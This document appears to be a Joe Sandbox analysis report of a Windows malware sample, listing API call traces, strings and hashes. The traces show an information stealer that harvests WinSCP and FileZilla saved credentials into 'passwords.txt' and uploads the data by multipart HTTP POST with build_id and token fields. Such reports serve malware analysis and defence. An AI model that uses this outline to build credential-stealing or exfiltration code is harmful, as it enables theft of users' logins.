                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                • String ID: wwww
                                                                                                                                                                                                                                                                                • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                • String ID: \LOCK
                                                                                                                                                                                                                                                                                • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1206570057-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InfoSystemwsprintf
• String ID:
• API String ID: 2452939696-0
APIs
• lstrlenA.KERNEL32(?), ref: 0040D09D
• strchr.MSVCRT ref: 0040D0B6
• strchr.MSVCRT ref: 0040D0CE
• lstrlenA.KERNEL32(?), ref: 0040D0EA
• GetProcessHeap.KERNEL32 ref: 0040D0FB
• HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
• strlen.MSVCRT ref: 0040D130
• strcpy_s.MSVCRT ref: 0040D184
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
• GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
• HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
• strcpy_s.MSVCRT ref: 0040D2D6
• GetProcessHeap.KERNEL32 ref: 0040D2E2
• HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
• GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
• GetProcessHeap.KERNEL32 ref: 0040D332
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
• strcpy_s.MSVCRT ref: 0040D34E
• GetProcessHeap.KERNEL32 ref: 0040D35A
• HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
• GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
• GetProcessHeap.KERNEL32 ref: 0040D39F
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
• strcpy_s.MSVCRT ref: 0040D3B7
• GetProcessHeap.KERNEL32 ref: 0040D3C3
• HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
• GetProcessHeap.KERNEL32 ref: 0040D3E4
• HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
• GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
• GetProcessHeap.KERNEL32 ref: 0040D429
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
• strcpy_s.MSVCRT ref: 0040D44B
• GetProcessHeap.KERNEL32 ref: 0040D457
• HeapFree.KERNEL32(00000000,00000000,77735E70), ref: 0040D461
• lstrlenA.KERNEL32(00000000), ref: 0040D468
• GetProcessHeap.KERNEL32 ref: 0040D47B
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
• strlen.MSVCRT ref: 0040D4B6
• lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
• strcpy_s.MSVCRT ref: 0040D50C
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
• GetProcessHeap.KERNEL32 ref: 0040D5C3
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
• lstrlenA.KERNEL32(00000000), ref: 0040D5D4
• GetProcessHeap.KERNEL32 ref: 0040D5E9
• HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
• strcpy_s.MSVCRT ref: 0040D602
• GetProcessHeap.KERNEL32 ref: 0040D60A
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
• strlen.MSVCRT ref: 0040D65C
• ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
• ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
• memset.MSVCRT ref: 0040D9DD
• memset.MSVCRT ref: 0040D9FA
• memset.MSVCRT ref: 0040DA10
• memset.MSVCRT ref: 0040DA26
• RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                • API String ID: 146520747-935134978

                                                                                                                                                                                                                                                                                Control-flow Graph

[Control-flow graph for the function at 00403090; legend: executed / not executed blocks. Graph not preserved in this text.]
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token

                                                                                                                                                                                                                                                                                Control-flow Graph

[Figure: control-flow graph beginning at block 403920-4039d0; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
